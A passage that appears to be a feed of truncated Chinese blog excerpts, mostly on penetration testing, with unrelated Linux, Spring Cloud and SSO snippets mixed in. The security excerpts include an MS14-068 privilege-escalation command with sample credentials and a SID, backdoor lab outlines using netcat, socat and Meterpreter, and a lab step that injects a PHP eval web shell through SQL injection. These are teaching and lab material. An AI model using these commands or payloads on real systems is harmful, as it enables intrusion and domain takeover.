ms14-068提权 工具利用 a)拿下边界机win7,并已经有win7上任意一个账号的密码 -u 用户名@域 -p 用户密码 -s 用户sid -d 域控 ms14-068.exe -u test3@superman.com -p Test#123 -s S-1-5-21-2030659959-700672918-1434258406-1113 -d win08.superman.com 生成一个ccache后缀票据 导入票据 导入之前,清空票据缓存 kerberos::purge kerbe…

linux提权和后门植入 目录 1. 脏牛漏洞复现 3 (1) 去网上把代码复制然后touch一个.c文件,vi或者vim打开将代码复制进去保存 3 (2) 进入shell然后从kali开的apache服务上下载 3 (3) 编译1.c文件 3 (4) 执行文件 3 (5) 切换改写过后的管理员账户(成功提权) 4 2. crontab计划任务 4 (1) vim /etc/crontab进入编辑(前提是有管理员权限) 4 (2) 重启后4444端口在运行 4 (3) 可以控制 4 3. sui…

本文是关于Apache struts2 CVE-2013-2251是由于导致执行远程命令的影响而被高度利用的漏洞.简而言之, 通过操纵以“action:”/”redirect:”/”redirectAction:”为前缀的参数引入的漏洞,允许在使用<Struts 2.3.15作为框架的Java Web应用程序中执行远程命令. 现在,当这个漏洞以病毒式疯狂传播时,主要的应用防火墙厂商开始更新它们的规则引擎和检测技术,以防止它发生. 但是作者不仅能够绕过防火墙并获得远程代码执行,还能够通过利用内核漏…

想象这种画面:你拿到了一台机器上Meterpreter会话了,然后你准备运行 getsystem 命令进行提权,但如果提权没有成功,你就准备认输了吗?只有懦夫才会认输.但是你不是,对吗?你是一个勇者!!! 这篇文章中我会讲Windows上一般提权的方法,并演示如何手动进行提权和其对应的Metasploit模块.当我们把权限从本地管理员提升到系统后更容易执行一些操作,而不适当的系统配置则可以使低权限的用户将自己的权限提升到高权限. Note:本文中我们主要关注于不依赖内核漏洞的提权,例如:KiTr…

免考final linux提权与渗透入门--Exploit-Exercise Nebula学习与实践 0x0 前言 Exploit-Exercise是一系列学习linux下渗透的虚拟环境,官网是https://exploit-exercises.com/,通过它可以学习提权,漏洞利用,逆向等知识 我们这里尝试的是Nebula,是一个涵盖初级.中级挑战任务的练习环境,一个有20个关卡.涉及到的知识点有: SUID文件(SUID files) 权限(Permission) 竞态条件(Race con…

一.系统用户操作指令 一般在 Linux 系统中有多个账号,但一般不推荐使用 root 账号,因为 root 账号的权限太大,如果账号泄露会有安全隐患: 一般配置软件时也不要在 root 账号下进行: useradd 和 adduser 的区别?(在不同的 Linux 系统中差异不同) 所有的用户都存放在 /home 目录中,/home 目录属于家目录: 1)useradd 添加新用户并设置密码 cd /home useradd imooc # 设置密码 passwd imooc 2)userd…

摸鱼的时候,想想内网这部分还有什么地方适合水一下,翻翻往期,开始填坑 总结一下Windows提权的部分,以后有时间再补一下Linux提权 这仍然是一篇思路总结类的随笔,具体细节内容不展开,也展开不了......欢迎去各大社区学习大佬们的操作 关于第三方提权以后再说 0x00前言 常见的Windows权限有三种:user administrator system (当然还有其他的) administrator管理员权限是比较高的,但是如果涉及到读取系统文件,还是要靠system权限 和web提权一…

0x01 漏洞起源 说到ms14-068,不得不说silver ticket,也就是银票.银票是一张tgs,也就是一张服务票据.服务票据是客户端直接发送给服务器,并请求服务资源的.如果服务器没有向域控dc验证pac的话,那么客户端可以伪造域管的权限来访问服务器.所以ms14-068的来源和银票是息息相关的. 在mimikatz作者的ppt里面是这样描述的: 所以说这真的是一个大漏洞,允许域内任何一个普通用户,将自己提升至域管权限.微软给出的补丁是kb3011780.在server 2000以上的…

在测试的工作中,提BUG是日常工作. 以前自己为了省事,省时,仅仅是截图,在图片上注明一下问题,就放到BUG库中了. 现在发现这样会造成开发的时间的浪费,增加了沟通成本. 对于BUG,当发现了异常时,首先自己重现一下刚才的步骤,判断是偶现还是可以重现,另外,也可以请同事,帮忙检查一下,按照步骤操作一次. 如果还是有疑问,可以请产品同事来帮忙确认,这样就可以避免与开发同事的争论. 当发现了BUG后,提到BUG管理工具中时,注意一下提BUG的格式. 提BUG格式: 标题(简单描述一下问题) 1,测试…

前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…

背景需求 EasyNVR的使用者应该都清楚的了解到,EasyNVR一个强大的功能就是可以进行全平台的无插件直播.主要原因在于rtsp协议的视频流(默认是需要插件才可以播放的)经由EasyNVR处理可以满足无插件的全平台直播.经由EasyNVR处理会获取到RTMP.HLS.HTTP-FLV视频流,这就完美解决了插件直播的问题,只要终端设备支持H5就可以完美的播放EasyNVR分发出的视频流,这也是EasyNVR成为众多互联网直播用户首选的原因. 考虑到用户使用的安全性,EasyNVR软件提供接口鉴…

最近又复习了一下内网的相关知识,把以前的整理了一下发出来做个记录. 0x01 哈希传递攻击概念 有一点内网渗透经验的都应该听说过哈希传递攻击,通过找到相应账户相关的密码散列值(LM Hash,NTLM Hash)来进行未授权登陆. 可参考Wikipedia的介绍,地址如下:https://en.wikipedia.org/wiki/Pass_the_hash 在域环境中,用户登录计算机时使用的大都是域账号,大量计算机在安装时会使用相同的本地管理员账号和密码,因此,如果计算机的本地管理员账号和密码…

​文章首发于公众号<Z2O安全攻防>​ 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看. https://mp.weixin.qq.com/s/WMGkQoMnQdyG8UmSyrAGIg 前言 Windows认证一般包括本地认证(NTLM HASH)和域认证(kerberos). 认证的原理网上有很多文章.如果喜欢听视频课程的话,这里推荐倾旋师傅的分享课 https://www.bilibili.com/video/BV1S4411e7hr?spm_id_from=333.788…

原文地址:http://blogread.cn/it/article/6086?f=wb 前言: 首先,笔记不是web安全的专家,所以这不是web安全方面专家级文章,而是学习笔记.细心总结文章,里面有些是我们phper不易发现或者说不重视的东西.所以笔者写下来方便以后查阅.在大公司肯定有专门的web安全测试员,安全方面不是phper考虑的范围.但是作为一个phper对于安全知识是:“知道有这么一回事,编程时自然有所注意”.有什么不妥.错误的请联系:chen_bin_wen@163.com/445…

概要: 1.php一些安全配置 (1)关闭php提示错误功能 (2)关闭一些“坏功能” (3)严格配置文件权限. 2.严格的数据验证,你的用户不全是“好”人 2.1为了确保程序的安全性,健壮性,数据验证应该包括内容. 2.2程序员容易漏掉point或者说需要注意的事项 3.防注入 3.1简单判断是否有注入漏洞以及原理 3.2常见的mysql注入语句 (1)不用用户名和密码 (2)在不输入密码的情况下,利用某用户 (3)猜解某用户密码 (4)插入数据时提权 (5)更新提权和插入提权同理 (6)恶意…

页面导航: 首页 → 网络编程 → PHP编程 → php技巧 → 正文内容 PHP安全 PHP开发中常见的安全问题详解和解决方法(如Sql注入.CSRF.Xss.CC等) 作者: 字体:[增加 减小] 类型:转载 这篇文章主要介绍了PHP开发中常见的安全问题详解和解决方法,详细介绍了例如Sql注入.CSRF.Xss.CC等攻击手段的背景知识以及解决方法,需要的朋友可以参考下 浅谈Php安全和防Sql注入,防止Xss攻击,防盗链,防CSRF 前言: 首先,笔者不是web安全的专家,所以这不是we…

软件操作相关命令 软件包管理 (yum) 安装软件 yum install xxx(软件的名字) 如 yum install vim 卸载软件 yum remove xxx(软件的名字) 如 yum remove vim 搜索软件(可以模糊匹配) yum search xxx yum search vim 清理缓存 yum clean packages 列出已安装 yum list 软件包信息 yum info xxx 服务器硬件资源信息 查看内存 -m 表示已 M 显示 free -m 查看硬…

实验目的 学习建立一个后门连接. 教程 实验内容 使用netcat获取主机操作Shell,cron启动. 使用socat获取主机操作Shell, 任务计划启动. 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell. 使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权. 实验要求 使用nc实现win,mac,Linux间的后门连接. meterpreter的应用. MSF…

一.实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝 二.实验步骤 2.1 使用netcat获取主机操作Shell,cron启动 2.1.1 windows下获得一个linux shell s…

1.基本概念 RBAC(Role-Based Access Control,基于角色的访问控制)在k8s v1.5中引入,在v1.6版本时升级为Beta版本,并成为kubeadm安装方式下的默认选项,相对于其他访问控制方式,新的RBAC具有如下优势: - 对集群中的资源和非资源权限均有完整的覆盖  整个RBAC完全由几个API对象完成,同其他API对象一样,可以用kubectl或API进行操作  可以在运行时进行调整,无需重启API Server 要使用RBAC授权模式,需要在API Serve…

一款开源的命令行自动SQL注入工具,它能够对多种主流数据库进行扫描支持,基于Python环境. 检测动态页面中get/post参数,cookie,http头 数据榨取/文件系统访问 操作系统命令执行 引擎强大,特性丰富 xss检测 支持主流的数据库 五种漏洞检测技术: 基于布尔的盲注检测 基于时间的盲注检测( 'and (select(sleep(20)))a)-- ) 基于错误的检测 基于union联合查询的检测(适用于通过循环直接输出联合查询结果,否则只显示第一项结果) 基于堆叠查询的检测(…

第12章 Linux中用户知识管理 12.1 系统开机启动流程 12.1.1 centos6系统开机启动流程 12.1.1.1 开机系统流程语言描述 服务器电源开关打开 bios自检 目的:检查硬件是否可以正常的使用 加载MBR 目的:可以加载系统引导分区和加载系统分区表 加载grub菜单 目的:选择要启动的内核 可以进入单用户模式 加载内核 目的:启动系统 运行系统中的第一个进程 加载系统运行级别(/etc/inittab) 目的:选择你要启动的系统级别 进行系统初始化操作(/etc/rc.d…

Sqlmap 开源,python编写 支持5种SQL注入检测技术: 1.基于布尔的注入检测 2.基于时间的注入检测 3.基于错误的注入检测 4.基于UNION联合查询的检测 5.基于堆叠查询的检测 支持的数据库管理系统(可能不支持mongodb): mysql.oracle.postgresql.sql_server.access.DB2等 其他特性: 数据库直接连接(相当于数据库的一个client):-d 与burpsuite.google结合使用,支持正则表达式限定测试目标 注入检测包含Ge…

单点登录的通用架构实现 pphh发布于2018年4月26日 http://www.hyhblog.cn/2018/04/26/single_sign_on_arch/ 目录 1. 什么是单点登录 2. 用户登录 2.1 认证方式 2.2 授权方式 2.3 第一方登录架构实现 2.4 第三方登录架构实现 2.5 第一方登录和第三方登录的授权区别 2.6 登录架构实现小结 3. 权限控制 3.1 分布式鉴权架构 3.2 集中式鉴权架构 3.3 分布式和集中式鉴权的优缺点 3.4 访问控制的粒度 3.…

kali渗透综合靶机(九)--Typhoon靶机 靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/ 一.主机发现 1.netdiscover -i eth0 -r 192.168.10.0/24,进过分析,确定192.168.10.162是目标靶机 二.端口扫描 1. masscan --rate=10000 -p0-65535 192.168.10.162 三.端口服务识别 1. nmap -sV -T4 -O -p 110,139,6…

目录 简单信息收集 主机发现 ping nmap 端口扫描 nmap OS及服务版本探测 nmap -sV 绕过防火墙尝试 诱饵 随机数据长度 随机顺序扫描目标 MAC地址欺骗 实现win10的渗透攻击 CVE-2017-0199(失败) 漏洞原理 实现过程 EasyFileSharing模块(失败) 攻击过程 msf web_delivery模块攻击(成功) 攻击原理 攻击过程 CVE-2019-9766(成功) 漏洞原理 攻击过程 进行提权 普通提权 利用系统漏洞 ms16_032 powe…

A.官网 https://spring.io/projects/spring-cloud B.简介 Spring Cloud是一个基于Spring Boot实现的云应用开发工具,它为基于JVM的云应用开发中涉及的配置管理.服务发现.断路器.智能路由.微代理.控制总线.全局锁.决策竞选.分布式会话和集群状态管理等操作提供了一种简单的开发方式.Spring Cloud专注于为典型用例提供良好的开箱即用体验,并为其他用户提供可扩展性机制. 开发一般都是三部曲,1:引入starter dependenc…

课程目录链接 快速上手Linux玩转典型应用-目录 目录 1. 软件操作命令 2. 服务器硬件资源信息 3. 文件操作命令 4. Linux文本编辑神器vim与其他常用命令 5. 系统用户操作命令 6. 防火墙的设置 7. 提权和文件上传下载的操作 ============================================================== 1. 软件操作命令 演示准备: Windows系统中使用Xshell,先连接到虚拟机,再在Xshell中进行操作 演示: (…

php开发面试题---攻击网站的常用手段有哪些,及如何预防(整理) 一.总结 一句话总结: 比较记忆:注意比较各种攻击的区别,比如csrf和xss,以及xss和sql,这样才能记住 1.Sql注入是什么? 执行sql操作的时候:用户的输入语句中包含sql或sql部分 依赖用户输入做sql查询的位置可能被用户输入sql语句:比如用户查询的关键字输入框 2.sql注入实例? 攻击者评论文章,评论里面是删除整个数据库的sql语句 在用户名框输入’or’=’or’或 ‘or 1=’1 然后sql如下:$…

php开发面试题---PHP为什么不安全及常见的攻击方式(整理) 一.总结 一句话总结: 其实安全和语言关系不大,主要和程序员关系比较大,php也就是因为是弱类型语言,所以不如java健壮,php会遇到的问题(比如sql注入等),java也会遇到,java解决方案比较多而已 1.银行系统的开发,以及其他金融类型的开发为什么会使用java开发而不是用php?php为什么不安全?java又安全在哪些方面? 1.PHP是弱数据类型的语言,Java是强制类型的语言,数据类型要求更为严格,这一特性使得Ja…